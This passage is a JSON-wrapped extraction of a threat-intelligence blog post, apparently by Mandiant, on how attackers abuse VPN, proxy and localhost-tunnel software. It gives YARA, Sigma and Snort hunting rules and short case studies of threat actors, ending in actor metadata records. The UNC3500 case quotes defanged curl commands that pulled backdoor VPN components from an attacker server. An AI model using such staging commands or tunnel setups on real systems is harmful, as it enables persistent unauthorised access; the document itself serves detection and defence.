\"\\\"background\\\":\" ascii nocase\r\n $anchorre1 = /\\\"default_title\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre2 = /\\\"description\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre3 = /\\\"name\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre4 = /\\\"short_name\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre5 = /\\\"default_title\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre6 = /\\\"description\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre7 = /\\\"name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre8 = /\\\"short_name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesize\r\n}\r\nLocalHost Tunnel Directions\r\nUse of Legitimate Processes\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 16 of 26\n\nConcern: Many LocalHost Tunnel processes utilize either legitimate processes (SSH) or custom non-malicious\r\nbinaries (ngrok, lt) to implement the tunnel. This hinders detection of abuse because detection leans towards\r\nmethodology and not binary identification.\r\nDirection: LocalHost Tunnels typically use unique and moderately identifiable structure of process commandlines,\r\nthis allows for to detection opportunities.\r\nLocalHost Tunnel Commandlines\r\nLocalhost Tunnel Host Commands (METHODOLOGY)\r\ntitle: 'Localhost Tunnel Host Commands (METHODOLOGY)'\r\ndescription: 'Detect potential localhost tunnel commandlines.'\r\nauthor: Mandiant\r\ndate: '2022-06-15'\r\nstatus: hunting\r\nlogsource:\r\n product: 'FireEye HX'\r\ndetection:\r\n selectionKnownCMDs:\r\n processEvent processCmdLine|re:\r\n - 'ngrok\\s+(http|tcp|tls|start)\\s+'\r\n - 'lt\\s+--port\\s+[0-9]{1,5}'\r\n - 'gotunnelme\\s+[0-9]{1,5}'\r\n selectionNgrokProcess:\r\n processEvent processCmdLine|contains: \"ngrok\"\r\n selectionNgrokCMD:\r\n processEvent processCmdLine|contains:\r\n - 'http '\r\n - 'tls '\r\n - 'tcp '\r\n - 'start '\r\n selectionLHRun1:\r\n processEvent processCmdLine|contains: \"ssh\"\r\n selectionLHRun2:\r\n processEvent processCmdLine|contains: \"-R\"\r\n selectionLocalTunnel1:\r\n processEvent processCmdLine|contains: \"localtunnel\"\r\n selectionLocalTunnel2:\r\n processEvent processCmdLine|contains: \"--port\"\r\n selectionLocalTunnel3:\r\n processEvent processCmdLine|contains:\r\n - \"/lt\"\r\n - \"\\lt\"\r\n - \" lt\"\r\n selectionLocalTunnel4:\r\n processEvent processCmdLine|contains:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 17 of 26\n\n- \" http\"\r\n - \" https\"\r\n selectionLocalTunnel5:\r\n processEvent processCmdLine|contains:\r\n - \"-s\"\r\n - \"--server\"\r\n - \"-h\"\r\n - \"--host\"\r\n - \"-p\"\r\n - \"--port\"\r\n condition: selectionKnownCMDs or (selectionNgrokProcess and selectionNgrokCMD) or (selectionLHRun1 and selec\r\nfields:\r\n - \"processEvent processCmdLine\"\r\n - \"processEvent Process\"\r\n - \"processEvent Username\"\r\n - \"processEvent Md5\"\r\nfalsepositives:\r\n - \"Unknown\"\r\nlevel: \"medium\"\r\nNgrok Agent IPs in Network Traffic\r\nHistorically, Ngrok’s tunneling protects origin servers by hiding the origin IPs. However, the origin IPs for all free\r\nendpoints are exposed in the ngrok-agent-ips header on all HTTP responses returned by the tunnel endpoint. This\r\ncan easily be hunted for and detected via Snort to better label and understand network session data.\r\nalert tcp any any -\u003e any any ( msg:\"M.Tunneler.HTTP.Ngrok.[response]\"; content:\"HTTP/1\"; depth:6; content:\"200\r\nOther Generic Directions\r\nFiles that contain common VPN equities\r\nConcern: Adversaries may use modified binaries to interact with VPN infrastructure. This more general direction\r\nallows for a comprehensive look into potential VPN-like behavior.\r\nDirection: Identify core binary components that are not so easily modified to match on (i.e. PDB paths, exports,\r\nthird-party libraries, domains, etc)\r\nGeneric Domains in Binaries\r\nrule M_Hunting_VPNEngine_GenericProxyVPNDomain_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for generic proxy/vpn domains.\"\r\n md5 = \"96842ad6cc00fab5776171c56812b9a5\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 18 of 26\n\nstrings:\r\n $UniqueProxyVPNDomain = /(proxy|vpn)\\.[^\\.]{1,100}\\.(net|com|org)/ ascii fullword nocase\r\n condition:\r\n filesize \u003c 5MB and ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c\r\n}\r\nConventionEngine\r\nAs documented in the Definitive Dossier of Devilish Debug Details: Part One:\r\n“Often users name folders and files based on their content. Computers force users to label and annotate their data\r\nbased on the data type, role, and purpose. This human-computer convention means that most digital content has\r\nsome descriptive surface area, or descriptive “features” that are present in many files, including malware files….\r\nNot all these features were meant to be in [a binary], and they were certainly not intended for defenders to notice.\r\nThis is especially true for PDB paths, which can be described as an outcome of the compilation process, a\r\ntoolmark left in malware that describes the development environment.”\r\nVPN or Proxy PDB Convention\r\nrule M_Hunting_Win_VPNEngine_PDB_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for VPN or Proxy PDB.\"\r\n md5 = \"2bf422e19e721b461f9e98271fb28ad3\"\r\n strings:\r\n $pdb = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,500}(vpn|proxy)[\\x00-\\xFF]{0,500}\\.pdb\\x00/ ascii no\r\n condition:\r\n filesize \u003c 5MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pdb\r\n}\r\nHunting 3rd Party Libraries\r\nWhile some products are more popular than others, there are countless VPN software companies and products.\r\nTherefore, relying on specific brand detections is not suitable for purposes of wide detections. Hence, detection\r\non popular third-party libraries that these software use at scale would allow a broader and more inclusive\r\nscope. Some of these third-party tunnel libraries include gotunnelme, golocaltunnel, localtunnel.net, and zdtun.\r\nGoTunnelMe Library\r\nrule M_Hunting_AscensionEngine_gotunnelme_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use gotunnelme.\"\r\n md5 = \"35fcc4b19946d1bc9c21add1f42d2b63\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 19 of 26\n\nstrings:\r\n $anchor = \"gotunnelme\" ascii nocase wide\r\n $func1 = \"NewTunnelConn\" ascii nocase wide\r\n $func2 = \"Tunnel\" ascii nocase wide\r\n $func3 = \"StopTunnel\" ascii nocase wide\r\n $func4 = \"ConnectRemote\" ascii nocase wide\r\n $func5 = \"NewTunnel\" ascii nocase wide\r\n $func6 = \"GetUrl\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nGoLocalTunnel Library\r\nrule M_Hunting_AscensionEngine_golocaltunnel_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use golocaltunnel.\"\r\n md5 = \"35fcc4b19946d1bc9c21add1f42d2b63\"\r\n strings:\r\n $anchor1 = \"localtunnel.go\" ascii nocase wide\r\n $func1 = \"readAtmost\" ascii nocase wide\r\n $func2 = \"Network\" ascii nocase wide\r\n $func3 = \"WaitFor\" ascii nocase wide\r\n $func4 = \"Accept\" ascii nocase wide\r\n $func5 = \"Addr\" ascii nocase wide\r\n $func6 = \"URL\" ascii nocase wide\r\n $func7 = \"ReachedEOF\" ascii nocase wide\r\n $func8 = \"setDefaults\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nLocalTunnelNet Library\r\nrule M_Hunting_AscensionEngine_localtunnelnet_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use localtunnel.net.\"\r\n md5 = \"35fcc4b19946d1bc9c21add1f42d2b63\"\r\n strings:\r\n $s1 = \"Localtunnel\" ascii nocase wide\r\n $s2 = \"LocaltunnelClient\" ascii nocase wide\r\n $s3 = \"ProxiedSslTunnelOptions\" ascii nocase wide\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 20 of 26\n\n$s4 = \"ProxiedSslTunnelConnection\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nZDTun Library\r\nrule M_Hunting_AscensionEngine_zdtun_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that use zdtun.\"\r\n md5 = \"f224e0c1ad6d27c76b1f87fdb8ada639\"\r\n strings:\r\n $anchor = \"zdtun\" ascii nocase wide\r\n $s1 = \"zdtun_conn_close\" ascii nocase wide\r\n $s2 = \"zdtun_conn_dnat\" ascii nocase wide\r\n $s3 = \"zdtun_conn_proxy\" ascii nocase wide\r\n $s4 = \"zdtun_conn_set_userdata\" ascii nocase wide\r\n $s5 = \"zdtun_fds\" ascii nocase wide\r\n $s6 = \"zdtun_finalize\" ascii nocase wide\r\n $s7 = \"zdtun_get_stats\" ascii nocase wide\r\n $s8 = \"zdtun_make_iphdr\" ascii nocase wide\r\n $s9 = \"zdtun_purge_expired\" ascii nocase wide\r\n $s10 = \"zdtun_set_dnat_info\" ascii nocase wide\r\n $s11 = \"zdtun_set_mtu\" ascii nocase wide\r\n $s12 = \"zdtun_set_socks5_proxy\" ascii nocase wide\r\n $s13 = \"zdtun_conn_get_userdata\" ascii nocase wide\r\n $s14 = \"zdtun_userdata\" ascii nocase wide\r\n $s15 = \"zdtun_init\" ascii nocase wide\r\n condition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nGeneric Proxy, Tunnel, or VPN Library via Github\r\nrule M_Hunting_AscensionEngine_GithubVPNProxy_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for binaries that include vpn/proxy/tunnel github links\"\r\n strings:\r\n $r1 = /github.com\\/[^\\/]+\\/[^\\/]*(vpn|VPN|proxy|Proxy|tunnel|Tunnel)[^\\/]*\\//\r\n $vpn = \"vpn\" nocase fullword\r\n $proxy = \"proxy\" nocase fullword\r\n $tunnel = \"tunnel\" nocase fullword\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 21 of 26\n\ncondition:\r\n ((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and filesiz\r\n}\r\nBinary Export Artifacts\r\nBased on Microsoft documentation, DLL files contain an exports table. The exports table includes the name of\r\nevery function that the DLL exports to other executables. These functions are the entry points into the DLL; only\r\nthe functions in the exports table can be accessed by other executables.\r\nThese export equities within files may help identify intent, especially as it pertains to unique exports and the goal\r\nwith their use. There are other unique portable executable details that allow for insight into possible intent,\r\nincluding resource names and domain presence.\r\nVPN Specific DLL Exports\r\nimport \"pe\"\r\nrule M_Hunting_Win_ExportEngine_vpn_dll_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Looks for an export dll containing the string vpn\"\r\n reference = \"https://twitter.com/stvemillertime/status/1241027937970814976?s=20\u0026t=t2Esf89F6T8LuiBsT8RV-g\r\n md5 = \"61d59eb2799b1a77eedf34b145cf23e1\"\r\n strings:\r\n $pcre = /[\\x00-\\x7F]{0,100}(vpn|VPN)[\\x00-\\x7F]{0,100}\\.(dat|dll|sys|exe)\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(p\r\n}\r\nProxy Specific DLL Exports\r\nimport \"pe\"\r\nrule M_Hunting_Win_ExportEngine_vpn_dll_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Looks for an export dll containing the string vpn\"\r\n reference = \"https://twitter.com/stvemillertime/status/1241027937970814976?s=20\u0026t=t2Esf89F6T8LuiBsT8RV-g\r\n md5 = \"61d59eb2799b1a77eedf34b145cf23e1\"\r\n strings:\r\n $pcre = /[\\x00-\\x7F]{0,100}(proxy|Proxy|PROXY)[\\x00-\\x7F]{0,100}\\.(dat|dll|sys|exe)\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(p\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 22 of 26\n\nVPN or Proxy Specific PE Resource Names\r\nimport \"pe\"\r\nrule M_Hunting_Win_VPNEngine_ResourceInPE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This signature is looking for VPN or Proxy subresources.\"\r\n md5 = \"2ce7a0ffa14134167945e8df84755f1c\"\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and for any i in (0.. pe.number_of_resources\r\nImpact - A Case Study\r\nAs analysts, researchers, engineers, etc. - time is limited. Time is one of the greatest resources that anyone has. So,\r\nit’s important to ask the question: Why care? Well, the following sections will highlight a variety of adversaries\r\nabusing the techniques and technologies discussed in this blog.\r\nUNC3500\r\nUNC3500 is a suspected Chinese actor that has leveraged CVE-2021-44228 to target entities in the education and\r\ntelecommunications sectors. The group has established persistence by creating a VPN and HTTPS server that\r\ncan function as a backdoor following initial compromise.\r\nFollowing reconnaissance and initial actions in a specific UNC3500 intrusion the attackers proceeded to download\r\nthe aforementioned VPN software and HTTPS server using the following commands:\r\ncurl hxxp://35.189.145[.]119/hamcore.se2 \u003e /mi/pki/mics/log/hamcore.se2\r\n(MD5: 9fb1191ba0064d317a883677ce568023)\r\ncurl hxxp://35.189.145[.]119/https \u003e /mi/pki/mics/log/https\r\n(MD5: 00352d167c44272dba415c36867a8125)\r\ncurl hxxp://35.189.145[.]119/vpn_bridge.config \u003e /mi/pki/mics/log/vpn_bridge.config \r\n(MD5: ce5d96252315e2c9d5fd9aeb98ae28ae)\r\nThe https and hamcore.se2 files are components of SoftEther’s VPN server bridge, PacketiX. The PacketiX VPN\r\nBridge creates a layer 2 connection between a physical network adapter on a local system and a remote SoftEther\r\nVPN server. It requires an accompanying library file hamcore.se2 and a configuration file vpn_bridge.config. By\r\ndeploying this package, UNC3500 established persistence on the compromised server.\r\nAPT40\r\nAPT40 primarily carries out intrusion activities against maritime industries and has been linked to activity dating\r\nback to at least 2013. In April 2021, four members of APT40 were indicted by the U.S. Department of Justice,\r\nalleged to be working on behalf of the MSS in Hainan. Operations may target sensitive data that would benefit\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 23 of 26\n\nresearch and development programs, inform decision makers sponsoring these actors, and enable further targeting\r\nof related organizations. \r\nOne methodology observed being used by APT40 includes exfiltration via VPN. Additionally, APT40 has\r\nbeen identified utilizing ProtonVPN and ExpressVPN.\r\nUNC2465\r\nIn a Supply Chain intrusion, SMOKEDHAM, a lightweight .NET-based backdoor used by UNC2465, used\r\nPowerShell to connect to third-party file sharing sites to download an Ngrok utility that was renamed\r\nconhost.exe. A script was used to execute Ngrok with a configuration file named ngrok.yml. Ngrok is a\r\npublicly available utility that can expose local servers behind NATs and firewalls to the public internet over secure\r\ntunnels.\r\nUNC2465 is a threat cluster that has previously deployed DARKSIDE ransomware and is suspected to have been\r\nactive since at least March 2020. UNC2465 activity is characterized by their ongoing use of similar tactics,\r\ntechniques, and procedures (TTPs) to distribute the publicly available PowerShell-based SMOKEDHAM\r\nbackdoor in victim environments. UNC2465 has extorted using a hybrid approach of DARKSIDE ransomware\r\nand extortion through a leaks website over TOR. DARKSIDE applies pressure initially through shaming a victim\r\nwith a small amount of data published on a the DARKSIDE blog followed by larger releases of data lasting\r\nseveral days if a client won't pay. This group likely represents an affiliate, only a smaller part of overall\r\nDARKSIDE ecosystem. UNC2465 has used phishing, web compromises, and supply chain access through the\r\ntrojanization of legitimate software installers. UNC2465 activities have continued past the overall shutdown of\r\nDARKSIDE RaaS.\r\nUnderground Forums\r\nAn English-speaking actor named 'idk' advertised access to U.S. Insurance and Healthcare companies in which the\r\nmethod of access listed was “OpenVPN installed” and “credentials from OpenVPN”.\r\nVPNs as Sources\r\nUNC3661 has used NordVPN to hide origin IPs for their remote interactions with victim environments.\r\nA NEARTWIST cluster of activity used against Ukraine (linked to APT28 with moderate confidence) logged in\r\nto web shells using ExpressVPN IP addresses.\r\nPrevalence\r\nA Jedi Master once said, “Prevalence is the number one thing analysts want”. So let's talk prevalence! Utilizing\r\nthe various detections and methods highlighted in this blog against housed Mandiant data, 40+ connections were\r\nmade to different adversary groups and malware families.\r\nAdversary Clusters and Groups\r\nAPT12\r\nMalware Families and Exploits\r\nBEACON\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 24 of 26\n\nAPT22\r\nAPT28\r\nAPT37\r\nAPT40\r\nUNC270\r\nUNC530\r\nUNC875\r\nUNC961\r\nUNC1066\r\nUNC1575\r\nUNC1585\r\nUNC1615\r\nUNC1804\r\nUNC2465\r\nUNC2984\r\nUNC3325\r\nUNC3500\r\nUNC3661\r\nUNC3804\r\nBEEBSINFO\r\nDARKNEURON\r\nDIMCLERK\r\nEMOTET\r\nHALFSPOT\r\nHIDEYHOLE\r\nHTRAN\r\nICEFOG\r\nIRONGATE\r\nKICKBACK\r\nLOKIBOT\r\nMETERPRETER\r\nMONEYRUN\r\nPACMAN\r\nPISCES\r\nPROXYDLL\r\nRICHBOAT\r\nSALSAVERDE\r\nSODARIVER\r\nSOGU\r\nTRICKBOT\r\nVENOMPROXY\r\nWMIEXEC\r\nWSHRAT\r\nZXSHELL\r\nCVE-2018-0802\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 25 of 26\n\nWhere Did We Go?\r\nThe use of VPN software, proxy services, and localhost tunnels provide adversaries an air of legitimacy, detection\r\nbypass via encryption, and potential point to point access. These characteristics are high value desires of an\r\nadversary, and make detection, containment, and eradication more burdensome on the blue team.\r\nHowever, in this blog VPN software, proxy services, and localhost tunnels were analyzed for hunting directions.\r\nThese hunting directions did include vendor and service specific items (SoftEther, Ngrok, WireGuard, OpenVPN,\r\nHide.Me, etc.), but also focused on wholistic and tradecraft-related directions (Conventions, 3rd Party Libraries,\r\nPE Artifacts, etc.).\r\nThese directions will expand the defender’s hunting and detection repertoire against these software and service\r\nsuites, lowing the burden on the blue team.\r\nHappy Hunting\r\nAcknowledgements\r\nThanks to everyone that contributed analysis and review. Special thanks to Matthew Dunwoody and Evan Reese.\r\nDisclaimer\r\nThe signatures documented in this blog are meant to be threat hunting directions and jump-points – empowering\r\nthe analyst to take the next step down the rabbit hole and identify suspicious activity. Every network is different\r\nand because of that, these signatures should not be deployed in production environments without testing and,\r\nwhen required, tuning.\r\nCase studies and examples are drawn from our experiences and activities working for a variety of customers, and\r\ndo not represent our work for any one customer or set of customers. In many cases, facts have been changed to\r\nobscure the identity of our customers and individuals associated with our customers.\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns" ], "report_names": [ "burrowing-your-way-into-vpns" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "1aead86d-0c57-4e3b-b464-a69f6de20cde", "created_at": "2023-01-06T13:46:38.318176Z", "updated_at": "2026-04-10T02:00:02.925424Z", "deleted_at": null, "main_name": "DAGGER PANDA", "aliases": [ "UAT-7290", "Red Foxtrot", "IceFog", "RedFoxtrot", "Red Wendigo", "PLA Unit 69010" ], "source_name": "MISPGALAXY:DAGGER PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d4b9608d-af69-43bc-a08a-38167ac6306a", "created_at": "2023-01-06T13:46:39.335061Z", "updated_at": "2026-04-10T02:00:03.291149Z", "deleted_at": null, "main_name": "LAPSUS", "aliases": [ "Lapsus", "LAPSUS$", "DEV-0537", "SLIPPY SPIDER", "Strawberry Tempest", "UNC3661" ], "source_name": "MISPGALAXY:LAPSUS", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8", "created_at": "2023-03-04T02:01:54.115678Z", "updated_at": "2026-04-10T02:00:03.360898Z", "deleted_at": null, "main_name": "Prophet Spider", "aliases": [ "GOLD MELODY", "UNC961" ], "source_name": "MISPGALAXY:Prophet Spider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7b039cc0-33b6-495a-b4ca-649d096b993d", "created_at": "2023-01-06T13:46:38.482654Z", "updated_at": "2026-04-10T02:00:02.99265Z", "deleted_at": null, "main_name": "APT22", "aliases": [ "G0039", "Suckfly", "BRONZE OLIVE", "Group 46" ], "source_name": "MISPGALAXY:APT22", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea", "created_at": "2023-01-06T13:46:38.745572Z", "updated_at": "2026-04-10T02:00:03.086207Z", "deleted_at": null, "main_name": "APT40", "aliases": [ "ATK29", "Red Ladon", "MUDCARP", "ISLANDDREAMS", "TEMP.Periscope", "KRYPTONITE PANDA", "G0065", "TA423", "ITG09", "Gingham Typhoon", "TEMP.Jumper", "BRONZE MOHAWK", "GADOLINIUM" ], "source_name": "MISPGALAXY:APT40", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "47b52642-e5b8-4502-b714-b625002d86aa", "created_at": "2024-06-19T02:03:08.086579Z", "updated_at": "2026-04-10T02:00:03.812509Z", "deleted_at": null, "main_name": "GOLD MELODY", "aliases": [ "PROPHET SPIDER", "UNC961" ], "source_name": "Secureworks:GOLD MELODY", "tools": [ "7-Zip", "AUDITUNNEL", "BURP Suite", "GOTROJ", "JSP webshells", "Mimikatz", "Wget" ], "source_id": "Secureworks", "reports": null }, { "id": "d18fe42c-8407-4f96-aee0-a04e6dce219a", "created_at": "2023-01-06T13:46:38.275292Z", "updated_at": "2026-04-10T02:00:02.907303Z", "deleted_at": null, "main_name": "APT12", "aliases": [ "Group 22", "Calc Team", "DNSCalc", "IXESHE", "Hexagon Typhoon", "BeeBus", "DynCalc", "Crimson Iron", "BRONZE GLOBE", "NUMBERED PANDA", "TG-2754" ], "source_name": "MISPGALAXY:APT12", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e9f7f836-b77f-4f95-aa02-9e99d32faf1d", "created_at": "2024-12-21T02:00:02.857057Z", "updated_at": "2026-04-10T02:00:03.791142Z", "deleted_at": null, "main_name": "UNC2465", "aliases": [], "source_name": "MISPGALAXY:UNC2465", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5d9dfc61-6138-497a-b9da-33885539f19c", "created_at": "2022-10-25T16:07:23.720008Z", "updated_at": "2026-04-10T02:00:04.726002Z", "deleted_at": null, "main_name": "Icefog", "aliases": [ "ATK 23", "Dagger Panda", "Icefog", "Red Wendigo" ], "source_name": "ETDA:Icefog", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Dagger Three", "Fucobha", "Icefog", "Javafog", "POISONPLUG.SHADOW", "RoyalRoad", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "83025f5e-302e-46b0-baf6-650a4d313dfc", "created_at": "2024-05-01T02:03:07.971863Z", "updated_at": "2026-04-10T02:00:03.743131Z", "deleted_at": null, "main_name": "BRONZE MOHAWK", "aliases": [ "APT40 ", "GADOLINIUM ", "Gingham Typhoon ", "Kryptonite Panda ", "Leviathan ", "Nanhaishu ", "Pickleworm ", "Red Ladon ", "TA423 ", "Temp.Jumper ", "Temp.Periscope " ], "source_name": "Secureworks:BRONZE MOHAWK", "tools": [ "AIRBREAK", "BlackCoffee", "China Chopper", "Cobalt Strike", "DadJoke", "Donut", "FUSIONBLAZE", "GreenCrash", "Meterpreter", "Nanhaishu", "Orz", "SeDll" ], "source_id": "Secureworks", "reports": null }, { "id": "1d63fba2-f042-41ca-8a72-64c6e737d295", "created_at": "2025-08-07T02:03:24.643647Z", "updated_at": "2026-04-10T02:00:03.719558Z", "deleted_at": null, "main_name": "BRONZE OLIVE", "aliases": [ "APT22 ", "Barista", "Group 46 ", "Suckfly " ], "source_name": "Secureworks:BRONZE OLIVE", "tools": [ "Angryrebel", "DestroyRAT", "PlugX" ], "source_id": "Secureworks", "reports": null }, { "id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a", "created_at": "2022-10-25T15:50:23.481057Z", "updated_at": "2026-04-10T02:00:05.306469Z", "deleted_at": null, "main_name": "Leviathan", "aliases": [ "MUDCARP", "Kryptonite Panda", "Gadolinium", "BRONZE MOHAWK", "TEMP.Jumper", "APT40", "TEMP.Periscope", "Gingham Typhoon" ], "source_name": "MITRE:Leviathan", "tools": [ "Windows Credential Editor", "BITSAdmin", "HOMEFRY", "Derusbi", "at", "BLACKCOFFEE", "BADFLICK", "gh0st RAT", "PowerSploit", "MURKYTOP", "NanHaiShu", "Orz", "Cobalt Strike", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "6a660ea2-1118-404a-9f8f-f0d6a1e9f184", "created_at": "2022-10-25T15:50:23.685924Z", "updated_at": "2026-04-10T02:00:05.364493Z", "deleted_at": null, "main_name": "APT12", "aliases": [ "APT12", "IXESHE", "DynCalc", "Numbered Panda", "DNSCALC" ], "source_name": "MITRE:APT12", "tools": [ "Ixeshe", "RIPTIDE", "HTRAN" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", 